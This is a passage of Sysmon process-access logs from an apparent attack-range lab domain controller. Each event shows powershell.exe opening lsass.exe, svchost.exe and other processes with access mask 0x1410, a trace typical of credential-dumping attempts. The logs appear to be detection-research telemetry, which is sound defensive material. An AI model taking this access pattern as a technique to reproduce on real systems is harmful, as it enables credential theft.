06:49:05.381","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","SourceProcessId":"2116","SourceThreadId":"2852","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010CEB20000}","TargetProcessId":"1076","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1111,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:05.381\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nSourceProcessId: 2116\r\nSourceThreadId: 2852\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:05.381","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","SourceProcessId":"2116","SourceThreadId":"2852","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1112,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:05.381\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nSourceProcessId: 2116\r\nSourceThreadId: 2852\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010773D0100}\r\nTargetProcessId: 2160\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:05.381","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","SourceProcessId":"2116","SourceThreadId":"2852","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010773D0100}","TargetProcessId":"2160","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1113,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:05.381\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nSourceProcessId: 2116\r\nSourceThreadId: 2852\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-00107F3E0100}\r\nTargetProcessId: 2168\r\nTargetImage: C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:05.381","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","SourceProcessId":"2116","SourceThreadId":"2852","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-00107F3E0100}","TargetProcessId":"2168","TargetImage":"C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1114,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:05.381\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nSourceProcessId: 2116\r\nSourceThreadId: 2852\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nTargetProcessId: 596\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:05.381","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","SourceProcessId":"2116","SourceThreadId":"2852","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","TargetProcessId":"596","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1115,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:05.381\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nSourceProcessId: 2116\r\nSourceThreadId: 2852\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-105A-5F25-0000-0010F8A90000}\r\nTargetProcessId: 992\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:05.381","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","SourceProcessId":"2116","SourceThreadId":"2852","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010F8A90000}","TargetProcessId":"992","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1116,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:05.381\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nSourceProcessId: 2116\r\nSourceThreadId: 2852\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-00100FBA0000}\r\nTargetProcessId: 1132\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:05.381","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","SourceProcessId":"2116","SourceThreadId":"2852","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-00100FBA0000}","TargetProcessId":"1132","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1117,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:05.381\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nSourceProcessId: 2116\r\nSourceThreadId: 2852\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:05.381","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","SourceProcessId":"2116","SourceThreadId":"2852","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1118,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:05.381\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nSourceProcessId: 2116\r\nSourceThreadId: 2852\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001015C40000}\r\nTargetProcessId: 1196\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:05.381","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","SourceProcessId":"2116","SourceThreadId":"2852","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001015C40000}","TargetProcessId":"1196","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
